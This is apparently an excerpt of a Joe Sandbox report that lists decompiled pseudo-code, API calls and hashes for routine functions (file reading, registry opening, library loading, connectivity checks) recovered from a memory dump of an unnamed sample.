                                                                                                                                                                                          0x00c9825b
                                                                                                                                                                                          0x00c982a0
                                                                                                                                                                                          0x00c982a0
                                                                                                                                                                                          0x00c982a4
                                                                                                                                                                                          0x00c982a4
                                                                                                                                                                                          0x00c982aa

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3_catch
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3886170330-0
                                                                                                                                                                                          • Opcode ID: 49e59918f24d5821b28c175b917dc9d952fd06730e04ec7d6faa2e00866fd235
                                                                                                                                                                                          • Instruction ID: 15eae90c00eca6853e576d7188266610ae1978d5e7e03a5218d103b4a037c9f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 49e59918f24d5821b28c175b917dc9d952fd06730e04ec7d6faa2e00866fd235
                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F0BE72911B00CFDB10DFA4C948B6AB7F4EF10321F56846AE44ADB291CB74D9008BA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C83E90 Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 24%
                                                                                                                                                                                          			E00C83E90(void* __edx, long __esi) {
				long _v4;
				int _t3;
				void* _t9;

				_t3 = ReadFile(__edx, _t9, __esi,  &_v4, 0); // executed
				if(_t3 != 0) {
					if(__esi != _v4) {
						E00C88420(1, 0xd47270);
						return 0;
					}
					return 1;
				} else {
					_push(0xd47270);
					_push(_t3);
					_push(_t3);
					E00C88150(0xd47270);
					return 0;
				}
			}






                                                                                                                                                                                          0x00c83e9b
                                                                                                                                                                                          0x00c83ea3
                                                                                                                                                                                          0x00c83ec5
                                                                                                                                                                                          0x00c83ecc
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c83ed4
                                                                                                                                                                                          0x00c83ed7
                                                                                                                                                                                          0x00c83ea5
                                                                                                                                                                                          0x00c83ea5
                                                                                                                                                                                          0x00c83eaa
                                                                                                                                                                                          0x00c83eab
                                                                                                                                                                                          0x00c83eb1
                                                                                                                                                                                          0x00c83ebc
                                                                                                                                                                                          0x00c83ebc

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,?,?,00000000,?,00C84DC5,?,00000000,?,00000000,?,?,00C81043,?), ref: 00C83E9B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: c1b068e7ee47387d99e014f8e241565ffe60978726033a635516cfe9fe8f2e38
                                                                                                                                                                                          • Instruction ID: 1ecdc28b120d957738bb042b1af92d38019cb237fdd57cf644f977aada30257d
                                                                                                                                                                                          • Opcode Fuzzy Hash: c1b068e7ee47387d99e014f8e241565ffe60978726033a635516cfe9fe8f2e38
                                                                                                                                                                                          • Instruction Fuzzy Hash: D8E086F27582007FEE20F6B45D4AF6B228CDB40B08F100838F489D1581FB94E94C527A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CA2CEF Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00CA2CEF(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char* _a8) {
				void* __ebp;
				intOrPtr _t6;
				intOrPtr* _t16;

				_t3 = __ecx + 0x68; // 0xd47b41
				_t6 = E00CA2AD2(_t3, __edx, __edi, _a4, _a8);
				_t16 = __ecx + 0x10fc;
				_t18 =  *_t16;
				if( *_t16 == 0) {
					_push(0x10000); // executed
					_t6 = E00CFCE8A(__ebx, __edx, __edi, _t18); // executed
					 *_t16 = _t6;
					if(_t6 == 0) {
						_a8 = "Fatal error: Out of memory!";
						return E00D00729( &_a8, 0xd4f494);
					}
				}
				return _t6;
			}






                                                                                                                                                                                          0x00ca2cfb
                                                                                                                                                                                          0x00ca2cfe
                                                                                                                                                                                          0x00ca2d03
                                                                                                                                                                                          0x00ca2d09
                                                                                                                                                                                          0x00ca2d0c
                                                                                                                                                                                          0x00ca2d0e
                                                                                                                                                                                          0x00ca2d13
                                                                                                                                                                                          0x00ca2d19
                                                                                                                                                                                          0x00ca2d1d
                                                                                                                                                                                          0x00ca2d28
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca2d2f
                                                                                                                                                                                          0x00ca2d1d
                                                                                                                                                                                          0x00ca2d36

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00CA2D2F
                                                                                                                                                                                            • Part of subcall function 00D00729: RaiseException.KERNEL32(?,?,?,00C880B1,?,?,?,?,?,00C880B1,00D59760,00D59760), ref: 00D0076B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionException@8RaiseThrow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3976011213-0
                                                                                                                                                                                          • Opcode ID: 340dc88a5202ba0cb7ddd3131142a056fdb9463d55b7a593670a02a1c1c6fb6b
                                                                                                                                                                                          • Instruction ID: 156014295cb61e6cb5fa5f7d0606fb33ff1de574bde2e2cefa91916f402affaa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 340dc88a5202ba0cb7ddd3131142a056fdb9463d55b7a593670a02a1c1c6fb6b
                                                                                                                                                                                          • Instruction Fuzzy Hash: A1E0923250021EAEDB20AF55D802F96BB98EB24368F00842AFD9C46151EBB499C4DB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C98A10 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E00C98A10(intOrPtr* __ecx, void* _a4, short* _a8, int _a12) {
				void* _v8;
				long _t9;
				intOrPtr* _t14;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t14 = __ecx;
				_t9 = RegOpenKeyExW(_a4, _a8, 0, _a12,  &_v8); // executed
				if(_t9 == 0) {
					_t9 = E00C92620(_t14);
					 *_t14 = _v8;
				}
				return _t9;
			}






                                                                                                                                                                                          0x00c98a13
                                                                                                                                                                                          0x00c98a14
                                                                                                                                                                                          0x00c98a20
                                                                                                                                                                                          0x00c98a2a
                                                                                                                                                                                          0x00c98a32
                                                                                                                                                                                          0x00c98a36
                                                                                                                                                                                          0x00c98a3e
                                                                                                                                                                                          0x00c98a3e
                                                                                                                                                                                          0x00c98a42

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,00000000), ref: 00C98A2A
                                                                                                                                                                                            • Part of subcall function 00C92620: RegCloseKey.ADVAPI32 ref: 00C9262C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 47109696-0
                                                                                                                                                                                          • Opcode ID: 39fcaea9e10e27ac8fe13c93ea7d97b0a1336070ad4e55074f3a64b01a66e168
                                                                                                                                                                                          • Instruction ID: f459669c7d2d0946dd90c6856402fd5609bfdc2a195cae3c12937f8e28d3a3fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 39fcaea9e10e27ac8fe13c93ea7d97b0a1336070ad4e55074f3a64b01a66e168
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E04F72600208FBDF159F40DC06FEE77A9EB54314F104019F841A6250DB75AF10EB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CF134E Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00CF134E(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t10;
				void* _t26;

				_push(4);
				E00D0155A(0xd380b2, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t26 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 1;
				_t10 =  *0xd5d01c; // 0xd5d014
				 *((intOrPtr*)(__ecx + 4)) = _t10;
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				E00CAC024(__ebx, __ecx + 0xc, __ecx + 4, __ecx,  *(_t26 - 4));
				E00CEAFBF(__ecx + 0x24);
				 *(_t26 - 4) = 2;
				E00C9ACF3(__ebx, __ecx + 4, __edx,  *(_t26 - 4), 0xb0); // executed
				return E00D01632(__ecx);
			}





                                                                                                                                                                                          0x00cf134e
                                                                                                                                                                                          0x00cf1355
                                                                                                                                                                                          0x00cf135c
                                                                                                                                                                                          0x00cf135f
                                                                                                                                                                                          0x00cf1365
                                                                                                                                                                                          0x00cf136d
                                                                                                                                                                                          0x00cf136f
                                                                                                                                                                                          0x00cf1376
                                                                                                                                                                                          0x00cf137e
                                                                                                                                                                                          0x00cf138a
                                                                                                                                                                                          0x00cf138e
                                                                                                                                                                                          0x00cf139a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CF1355
                                                                                                                                                                                            • Part of subcall function 00CAC024: __EH_prolog3.LIBCMT ref: 00CAC02B
                                                                                                                                                                                            • Part of subcall function 00CEAFBF: InitializeCriticalSection.KERNEL32(?,?,00CF1383,00000004,00C9BB63,?,?,?,?,?,?,00000000), ref: 00CEAFCC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3$CriticalInitializeSection
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1185523453-0
                                                                                                                                                                                          • Opcode ID: 266ca193b210af9b3b987f0e8efd86dbc9cf33378420932e8aab846724e2acd8
                                                                                                                                                                                          • Instruction ID: 88429ab541eff3b7f9ca26c1001adf7a69e24c741438e923d796002c299fa129
                                                                                                                                                                                          • Opcode Fuzzy Hash: 266ca193b210af9b3b987f0e8efd86dbc9cf33378420932e8aab846724e2acd8
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E06D70500351CBD710EB98C812799B3F4AF00704F40440CE5599B381DBB5AA0597A2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CB6066 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E00CB6066(intOrPtr* __ecx, void* __esi, void* __eflags) {
				intOrPtr _t6;
				void* _t9;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				intOrPtr* _t16;
				void* _t17;
				void* _t18;

				_t18 = __eflags;
				_push(4);
				E00D0155A(0xd32432, _t9, _t14, __esi);
				_t16 = __ecx;
				_t12 = E00D0167F(_t9, _t13, _t14, _t18, 0xdf8);
				 *((intOrPtr*)(_t17 - 0x10)) = _t12;
				_t6 = 0;
				 *((intOrPtr*)(_t17 - 4)) = 0;
				_t19 = _t12;
				if(_t12 != 0) {
					_t6 = E00CDE234(_t9, _t12, _t14, _t16, _t19); // executed
				}
				 *_t16 = _t6;
				return E00D01632(_t16);
			}











                                                                                                                                                                                          0x00cb6066
                                                                                                                                                                                          0x00cb6066
                                                                                                                                                                                          0x00cb606d
                                                                                                                                                                                          0x00cb6072
                                                                                                                                                                                          0x00cb607f
                                                                                                                                                                                          0x00cb6081
                                                                                                                                                                                          0x00cb6084
                                                                                                                                                                                          0x00cb6086
                                                                                                                                                                                          0x00cb6089
                                                                                                                                                                                          0x00cb608b
                                                                                                                                                                                          0x00cb608d
                                                                                                                                                                                          0x00cb608d
                                                                                                                                                                                          0x00cb6092
                                                                                                                                                                                          0x00cb609b

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CB606D
                                                                                                                                                                                            • Part of subcall function 00D0167F: _malloc.LIBCMT ref: 00D01699
                                                                                                                                                                                            • Part of subcall function 00CDE234: __EH_prolog3.LIBCMT ref: 00CDE23B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3$_malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1683881009-0
                                                                                                                                                                                          • Opcode ID: a279fcfc34b42d1a9b8ef561ce7071ab4ab5c80db10fed09930c30b7e4aecfdf
                                                                                                                                                                                          • Instruction ID: febfcaa894c522c6816b4b321cdc1bdd34b251bd5fe247db5504d6faa1b6784e
                                                                                                                                                                                          • Opcode Fuzzy Hash: a279fcfc34b42d1a9b8ef561ce7071ab4ab5c80db10fed09930c30b7e4aecfdf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D01778A401114BDB58FBB8482272C61E1AB54300F94456EE25ECB3C1EA709A40873A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9820F Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E00C9820F(long* __ecx) {
				void* __esi;
				long _t2;
				void* _t6;
				void* _t7;
				void* _t11;
				void* _t12;
				intOrPtr* _t13;
				void* _t14;

				_t13 = __ecx;
				_t2 =  *__ecx;
				_t14 = _t2 - 0xc -  *0xd5d018; // 0xd5d008
				if(_t14 != 0) {
					_t2 = InterlockedDecrement(_t2 + 0xfffffff4);
					if(_t2 <= 0) {
						_t5 =  *_t13 - 0xc;
						_push( *_t13 - 0xc); // executed
						_t6 = E00D00BDC(_t7, _t11, _t12, _t13, _t5); // executed
						return _t6;
					}
				}
				return _t2;
			}











                                                                                                                                                                                          0x00c98210
                                                                                                                                                                                          0x00c98212
                                                                                                                                                                                          0x00c98217
                                                                                                                                                                                          0x00c9821d
                                                                                                                                                                                          0x00c98223
                                                                                                                                                                                          0x00c9822b
                                                                                                                                                                                          0x00c9822f
                                                                                                                                                                                          0x00c98232
                                                                                                                                                                                          0x00c98233
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c98238
                                                                                                                                                                                          0x00c9822b
                                                                                                                                                                                          0x00c9823a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DecrementInterlocked
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3448037634-0
                                                                                                                                                                                          • Opcode ID: 75e07898b795c5c04a4ad54d365b854f21f622e24aa0b8c24f67a3b66516ae3b
                                                                                                                                                                                          • Instruction ID: 61b90bddfa0c4c408fa9c8d337d940cbfed20a4de2940a90cdb2472200cd92ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 75e07898b795c5c04a4ad54d365b854f21f622e24aa0b8c24f67a3b66516ae3b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 49D01772909A119FCA28AFBCEC9D94677D8EF023203240A4AF064D3694EA60ED448A70
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8E450 Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00C8E450(void* __eflags, WCHAR* _a4) {
				void* _t2;
				struct HINSTANCE__* _t3;
				WCHAR* _t4;

				_t4 = _a4;
				_t2 = E00C8E370(__eflags, _t4, 0, 0, 0); // executed
				if(_t2 != 0) {
					_t3 = LoadLibraryW(_t4); // executed
					return _t3;
				} else {
					return _t2;
				}
			}






                                                                                                                                                                                          0x00c8e452
                                                                                                                                                                                          0x00c8e45d
                                                                                                                                                                                          0x00c8e464
                                                                                                                                                                                          0x00c8e46c
                                                                                                                                                                                          0x00c8e474
                                                                                                                                                                                          0x00c8e468
                                                                                                                                                                                          0x00c8e468
                                                                                                                                                                                          0x00c8e468

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,00000000,00000000,00000000), ref: 00C8E46C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                          • Opcode ID: 4d5176bd9c0464dd1313131e56672c6c54db4738d8c3bfbf4aa0556d04d1a190
                                                                                                                                                                                          • Instruction ID: 63b6e3b454309bde97f5b5dc193ee2bdb5b865d1efe7ef5ca11fa7e8d9358ab7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d5176bd9c0464dd1313131e56672c6c54db4738d8c3bfbf4aa0556d04d1a190
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3ED0C97324262069E52472946C0AFCBA34C8F66B66F20802AF702AA4D097A4691157AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE7ADD Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CE7ADD(void* __ecx) {
				long _v8;
				int _t5;
				void* _t10;

				_t5 = InternetGetConnectedState( &_v8, 0); // executed
				if(_t5 == 0 || (_v8 & 0x00000007) == 0) {
					return E00CE7A6A(_t10, __eflags);
				} else {
					return 1;
				}
			}






                                                                                                                                                                                          0x00ce7ae7
                                                                                                                                                                                          0x00ce7aef
                                                                                                                                                                                          0x00ce7b02
                                                                                                                                                                                          0x00ce7af7
